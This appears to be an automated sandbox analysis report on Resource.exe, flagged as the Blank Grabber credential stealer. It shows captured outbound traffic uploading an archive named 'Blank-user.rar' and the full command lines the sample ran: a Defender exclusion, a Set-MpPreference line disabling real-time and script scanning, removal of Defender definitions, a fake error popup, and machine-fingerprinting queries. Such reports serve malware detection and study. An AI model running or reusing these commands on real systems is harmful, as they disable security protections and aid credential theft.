2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: 2d 2d 34 66 31 33 35 63 62 34 38 63 31 33 61 62 36 64 62 37 34 66 36 30 63 65 34 65 38 64 32 63 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 bd b8 91 7f 21 04 00 00 01 0f e1 4f 41 2f 94 3d 26 70 25 e8 ec 1f 9c c0 61 56 8b c1 22 fb ba 88 f9 6f ee 20 21 6a 6b 28 65 ee 11 f5 84 e1 8d b8 2a 46 39 94 65 f5 10 7c 30 7c 33 08 40 aa 29 46 b3 4b 48 3f 9a 5b 49 5a ea 68 cf 92 8a 4a 6f c9 40 f3 f4 c0 f0 2b 45 d2 3c af 7f Data Ascii: --4f135cb48c13ab6db74f60ce4e8d2c0eContent-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!OA/=&p%aV"o !jk(e*F9e\|0\|3@)FKH?[IZhJo@+E<
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: 5a c9 2d e1 b9 c5 dd 42 62 e1 57 fc 19 75 a0 bb 84 f3 d7 53 88 4f 90 ef ce da 68 92 fe 02 2b 0f fe b5 e3 2a 46 df 51 60 bd 77 e7 4a cf f6 80 44 9a 2b 3a ed 44 f9 8d 97 42 34 e6 fd 9a e7 55 8d 6d 45 05 47 cf 68 8e a9 3e 0d 32 a0 cf 05 a0 d5 91 f9 00 10 af e1 08 b6 ce 8d d6 02 99 4c f2 8a 89 7c 63 fb e1 7f 4b 80 d5 a1 fc a0 7c 41 1e 2d 23 2a bc 89 f2 08 22 c5 7c 43 58 a2 03 99 d1 24 c0 3f 0f ca ad 17 33 56 11 0a 59 25 a3 64 ae 13 44 09 88 6e 2a 4d 42 30 0c 49 be f1 44 25 d6 42 09 82 9f 60 02 a2 ea 8f 76 d8 4e b8 88 89 1f fd 09 8a 81 d5 02 d9 5e 02 39 9c 65 c8 b2 44 38 69 84 70 8d 54 fd ec a8 af f9 da a0 02 c5 1e db c6 75 ea c0 39 4c 7d ce 79 c2 81 ac d7 4f 77 b6 c0 cb 63 8a 1d 88 7c 9f cb f2 c3 bd 7d 84 c6 b7 82 e3 c3 2f 22 19 28 6f 9d 66 30 1b 07 e8 84 8f Data Ascii: Z-BbWuSOh+FQ`wJD+:DB4UmEGh>2L\|cK\|A-#"\|CX$?3VY%dDn*MB0ID%B`vN^9eD8ipTu9L}yOwc\|}/"(of0
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: 4e 9f c4 6e 62 43 9e 4c a1 1c 4e c5 55 76 2d 08 79 35 14 f1 37 8c 48 0b 3c 2b 76 37 e2 ce 9c 1b 8c 70 d8 36 9d 65 d2 bd 43 87 e4 a5 4a 4e f0 b8 40 2f 87 ac e5 df 1a 86 ff e3 e7 5a d1 f8 a5 ad 33 72 83 0c d7 75 7d e3 81 5e 0e 55 cd 0b 29 b2 56 e3 c2 de 58 26 ac 30 56 7a ff b7 19 62 34 22 a9 23 d3 65 3e 93 d4 9c 51 4c cd ef cf af fb ba 2b d2 fc cb 8c 55 bd 3b eb 7d 4e 4d e9 52 66 04 89 60 d2 2a d4 b9 a9 f8 2c b3 e9 02 69 71 33 ef fe 2a da b5 60 5d f4 06 fa 43 27 b6 19 5e 03 64 3c c5 58 45 7e d4 7b e6 bd fb b9 b8 f8 89 90 cc e9 12 9a 33 da 13 e3 27 84 ca 90 9a 62 65 57 e9 40 63 b9 9d 07 dc c5 f5 f6 66 49 36 37 41 a3 64 74 3c 13 1b d2 95 22 d6 63 e0 97 4c fe ee 0d 28 e4 6a c4 10 fe e1 9a 7f 16 07 a4 4c 01 a0 69 73 db 86 59 dd b8 8b dd 96 96 3e 2f 69 93 2b 57 Data Ascii: NnbCLNUv-y57H<+v7p6eCJN@/Z3ru}^U)VX&0Vzb4"#e>QL+U;}NMRf`,iq3`]C'^d<XE~{3'beW@cfI67Adt<"cL(jLisY>/i+W
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: 65 95 f6 31 2b c0 c0 4a 7f bc 08 10 0c e8 98 e0 af a4 ef f1 c3 5a f9 d9 15 d3 c9 2a 72 c3 01 7a 3e 1c 8d 52 11 3f c9 81 69 a9 1f 76 df ed 13 61 34 1f af 3a 4e 62 fd 11 73 49 c9 4f f0 87 fb 18 19 27 d4 46 a1 6f 1c 41 e2 a1 0d f1 42 af cb 84 51 d6 3f 5c a4 7e c4 13 83 62 7c 36 50 32 70 05 a1 34 e0 22 5b 9f fb 0d 7f e2 29 ce e1 65 65 46 22 e2 8c 7d 9b 97 a3 57 5f 32 f1 dd 33 bb 29 1f 5c 1f 0a 31 06 bf 42 1f 4c 16 83 a7 38 0f 1a f6 9d 86 94 1f e4 a8 d8 40 e1 e1 fc 9e eb 82 dd 86 df 09 25 20 d0 ef 65 f7 a2 70 4e 87 6e e9 28 2d 8a 95 6f 54 22 3e d7 c0 b1 bb 9f 7a 27 4f f8 d2 9d 59 6c da a2 9d 99 09 3c bf 9d 0f 33 2f 99 f4 bc 6b e1 39 a7 82 0d 3c 46 71 66 0f 97 2c 09 87 3f b3 de a3 ea f5 94 13 14 97 99 68 d7 02 d8 80 3f 8e 89 ad cb e1 9f 42 42 52 74 51 fc 17 50 Data Ascii: e1+JZ*rz>R?iva4:NbsIO'FoABQ?\~b\|6P2p4"[)eeF"}W_23)\1BL8@% epNn(-oT">z'OYl<3/k9<Fqf,?h?BBRtQP
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: be 58 fe 51 67 c2 b9 20 f9 f4 b1 02 ab cc bc e0 91 c7 27 f5 7a 13 d4 5e c1 b5 4b 73 27 30 08 94 4e 71 98 36 bc 02 c3 24 28 1d 71 f1 9b 5b 69 35 e0 cd ae 7f 85 85 09 95 15 12 38 75 74 f8 c3 a5 57 b0 5c 8a 4e b1 57 6f 51 a1 19 81 e7 ed df df 44 cc a5 bd 7e 1c e3 c2 b6 e0 97 59 50 98 a7 16 a9 6e 30 e6 e1 f2 92 2f e2 43 18 50 96 78 5d b8 80 c9 97 fa d8 d8 6a c4 00 d4 77 05 38 ab c1 b0 c7 86 02 7e b2 84 df c5 5c d0 39 2d 85 da 4a d4 1b 4c 70 2a 3f 4d 89 b3 46 62 a3 cd fd 2a 7f dc f5 6d 69 53 a9 92 21 be b7 87 12 ab 2d 6a da f5 45 bf 08 a2 08 19 25 12 3d 46 16 da ec 29 ba dd ee 94 28 4e 66 d8 f8 92 27 ef bb dd 8e c3 e6 4a e6 2e f4 da af f0 f3 e4 06 f3 5b 07 fc 8e e0 54 95 4b 46 9e fc 37 c4 d3 c8 40 c9 23 52 32 34 a0 10 03 45 be 42 95 bc ce 94 1e 29 46 22 11 85 Data Ascii: XQg 'z^Ks'0Nq6$(q[i58utW\NWoQD~YPn0/CPx]jw8~\9-JLp?MFbmiS!-jE%=F)(Nf'J.[TKF7@#R24EB)F"
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: c2 08 be 31 9b 42 3a 85 eb c3 49 e1 a0 04 68 59 b2 c5 27 56 b7 ff 02 99 08 6d a7 f5 c7 35 61 6a b7 0f ca 32 0e 95 7b 71 16 2f 59 f0 65 cb 2f 09 a8 a7 70 da 51 39 64 99 0c f0 8e 65 3b 0e 01 05 f2 7a 43 2c 9a 33 72 c3 5c ba 6d c1 b2 18 bc 2b d0 dd 6e 0f 7c 88 40 dd b0 2f d7 78 c1 f9 37 f9 88 0a ac 12 10 2c 3d ce 8b 54 4a 0d 74 37 96 c5 a3 c3 ff 22 f4 c0 63 0b d1 60 d4 a0 16 d1 91 e1 a9 fc 39 81 cb 62 68 57 28 af e2 b2 cf 62 bd 05 a7 0b d2 f2 42 83 93 4a 0c 52 2c b2 e3 fa 59 61 a2 7c 36 c9 5c 10 0d 8d 62 2d be 2d 39 dd 0a 61 c7 54 12 3a 3f ed 28 3d 4d a7 2b 02 db 59 f6 80 fa cb 27 ee 87 53 aa 47 f7 b3 1a 19 8a 0d 83 b0 fb 2d f4 f8 5a e3 9d c9 28 b8 19 60 ea b4 90 38 23 d8 c7 9c 4a 09 6c b5 f2 12 eb 29 3e 4e da 6d fd f3 a3 1a 01 69 d9 f4 6f 9c 6f 4b 42 3c fc Data Ascii: 1B:IhY'Vm5aj2{q/Ye/pQ9de;zC,3r\m+n\|@/x7,=TJt7"c`9bhW(bBJR,Ya\|6\b--9aT:?(=M+Y'SG-Z(`8#Jl)>NmiooKB<
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: dd 55 d7 fd f3 b1 76 dd fe 56 cb 91 d7 a5 59 ac 82 9c d2 c1 31 79 a4 2d e6 b8 76 7a 6e ee 28 cc 0e 1c f3 27 06 3b 32 e3 a0 ba 8c a5 2d ea 01 ec 6a 9d 7a 9e d8 08 2c 21 96 c1 8f 50 ff a4 16 2b 06 8c c2 56 23 67 4c 99 55 f8 e5 72 6f 63 66 c6 3b db eb 34 e6 f4 d7 51 1f 90 86 9e b7 c8 f7 aa 36 09 d7 8b fd 15 9c c7 3d 14 4c 57 cd f7 64 0b cd c0 c3 82 8d 95 77 ca 52 7f b4 ea 80 a9 95 7a 4f 64 96 2d c7 4f e3 da ac 0e ca 9b 46 48 a8 21 40 1c ae 51 90 10 96 b6 e8 35 50 29 e4 85 02 e8 d4 a4 2a 6b a9 f9 74 6b 70 e0 ee 6e 84 49 5a 8a 1c 0d 7a 94 bf 40 21 4a 1e c7 03 31 c5 5f d7 14 a4 40 65 b0 d8 36 5f 85 36 ba 42 35 3a 44 24 ec e3 16 2a 5d 95 b0 af 86 16 c7 62 76 67 69 6c f5 7f 8a 4b fe 9f ce 90 a4 81 6a 55 7f 10 22 dd 19 12 4a c2 69 55 9f 2f 17 ae 74 b6 bd 3c 56 87 Data Ascii: UvVY1y-vzn(';2-jz,!P+V#gLUrocf;4Q6=LWdwRzOd-OFH!@Q5P)ktkpnIZz@!J1_@e6_6B5:D$]bvgilKjU"JiU/t<V
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: a2 e2 5f 5b 9b ab b3 f6 d5 5c 33 ad b4 b5 37 b4 95 24 e3 6c 2b 14 0e df e1 ee fa 60 58 59 a9 0f f9 3c dc 30 45 df 2a 58 2b 36 9e 5b 22 3e 6f 0b 2b 88 49 83 72 ea 26 0c 00 14 66 e4 99 8d 79 df 4d 5f d8 d6 bc 54 87 66 44 02 4b 9e 0a e4 04 af f2 e4 46 73 b3 e1 75 16 72 1d 25 67 34 83 c6 9b b8 39 0c 11 8a 2d ba 78 88 5c c6 d7 9e 08 6e b6 91 4d 6f e6 6d 28 ec 3b bb 80 8c ce e6 d7 ec 65 a7 2d 28 37 5c 78 24 6c 27 36 b6 51 f5 b2 e1 3d b2 98 58 8a 7d c3 b8 bb 71 34 9d 04 d0 95 51 e4 9c 2a 48 4c c9 67 87 a7 c4 d3 3a cc 8e db af 36 f9 a8 31 d4 76 75 f4 50 b1 db e4 61 6a 67 d4 b6 a8 5f 6a a2 5e d1 6b 28 65 4b dc 36 67 f2 bc 43 62 d6 a9 08 22 dc 80 67 ae fe 49 dd d6 7c ba b7 10 9c c6 9d 4c e8 5c bc 37 37 9e 9b 2e 53 bf cc 61 1b c3 c8 cf bc 84 ca 32 41 65 fe 51 3a 6a Data Ascii: _[\37$l+`XY<0EX+6[">o+Ir&fyM_TfDKFsur%g49-x\nMom(;e-(7\x$l'6Q=X}q4QHLg:61vuPajg_j^k(eK6gCb"gI\|L\77.Sa2AeQ:j
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: 49 20 ce 12 ae 92 b6 ec 05 01 cb 76 c9 86 69 fc 7e f2 d5 69 bb ab 6b 49 f6 49 a6 89 75 26 92 6a ff 3a 1e b8 2a bb f9 f0 40 c6 6a 52 e7 2b a6 9d be 0a 24 a6 2e ef 1a 57 dd 1b 6f 1d 9d 21 d9 71 cf ce 43 c3 94 ff 4b 55 db 27 7a 13 ba 7b 5f ea a7 45 f4 a8 41 fc eb c5 df 9c 93 71 8d 63 8f 43 bf ba 55 f0 a7 b1 12 5b 07 14 e9 3e 7b ba 0d f7 47 c5 43 9b 7f b5 00 d7 3f b8 99 31 eb c3 7e 78 1a 39 62 d9 ec e2 58 02 5c bf 1e 0e ef 0e e5 68 50 86 82 89 b0 06 9f f4 eb 5a 41 42 59 3a de 67 73 c6 97 27 98 9b 46 cf 60 df 70 ac b1 9f 46 26 83 81 ec 66 0f e1 fb 60 c7 40 bf 43 59 8f b3 ac b8 1f d4 8a 1e 10 c3 c9 8a ce 33 15 47 9c 2b 24 19 78 15 d5 e8 40 d3 9b 9d b4 4d 17 c9 78 33 52 4e dc e4 ee ca a5 d1 80 b9 97 92 1f 15 f6 f5 ab 25 c0 5d 10 73 fe da 35 64 8d f1 ff 03 ba 5c Data Ascii: I vi~ikIIu&j:*@jR+$.Wo!qCKU'z{_EAqcCU[>{GC?1~x9bX\hPZABY:gs'F`pF&f`@CY3G+$x@Mx3RN%]s5d\
2025-01-06 15:18:39 UTC	16384	OUT	Data Raw: 53 a7 ac 86 42 f6 ae 42 ab f1 ec 43 89 f3 a7 01 fe db 08 7f 49 f3 f6 23 66 80 ac ef d6 af b1 cc 6a 13 e2 b4 c4 d5 ce 0f 88 95 d4 5c 37 7f 7c 22 56 57 2a f4 69 d4 99 61 96 12 5b 10 50 9c ea ff d8 f6 f8 bb 75 cd ee 4d d4 e8 b5 5b b8 f0 5f 4e ce 03 82 ef 1d 6e cd 49 ff d3 e6 39 6b 97 8a 3a f1 e9 b8 37 5c c2 e6 cd ce 85 da e1 00 b0 ea 06 60 ae 1e 10 2e 0b 9c dd 63 d1 45 74 aa 62 56 fc c8 3f 80 19 09 0d 97 41 8a ef da 6f 39 c0 66 60 ac af 07 07 b5 fd be ba 34 32 ce 20 6b 98 81 77 98 f9 46 e6 3d a5 0c c9 a9 df df 75 5d 59 ca 64 f7 44 ed f2 b2 b1 f8 bb 9b 06 5a 78 e3 4f 27 62 05 79 fe 2a 80 b6 7d ff a3 c1 1d cd ce 50 ad 78 e7 c9 6d 64 e1 4a 68 f0 aa 4a e0 b4 5a 64 d1 cf 2c b2 2a 4b 94 d4 04 58 22 7b 35 b9 3c 7b 55 dd ab dd fb 57 1c 9e 96 33 9b d3 e0 86 24 22 30 Data Ascii: SBBCI#fj\7\|"VWia[PuM[_NnI9k:7\`.cEtbV?Ao9f`42 kwF=u]YdDZxO'by}PxmdJhJZd,*KX"{5<{UW3$"0
2025-01-06 15:18:40 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 15:18:39 GMT Content-Type: application/json Content-Length: 1673 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	0
Start time:	10:17:54
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\Resource.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Resource.exe"
Imagebase:	0x7ff6e60a0000
File size:	7'714'511 bytes
MD5 hash:	CD56D1639C638EF44A1CBCF6756EF2BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2019140558.00000203A2F47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2019140558.00000203A2F49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:17:54
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\Resource.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Resource.exe"
Imagebase:	0x7ff6e60a0000
File size:	7'714'511 bytes
MD5 hash:	CD56D1639C638EF44A1CBCF6756EF2BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2473117545.0000020AB3C0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2467713655.0000020AB46E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff78c900000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"
Imagebase:	0x7ff6316c0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:17:57
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6c8e70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:17:59
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:17:59
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:18:00
Start date:	06/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff748520000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:18:00
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:18:00
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:18:00
Start date:	06/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff748520000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:18:00
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:18:00
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:18:01
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6c8e70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
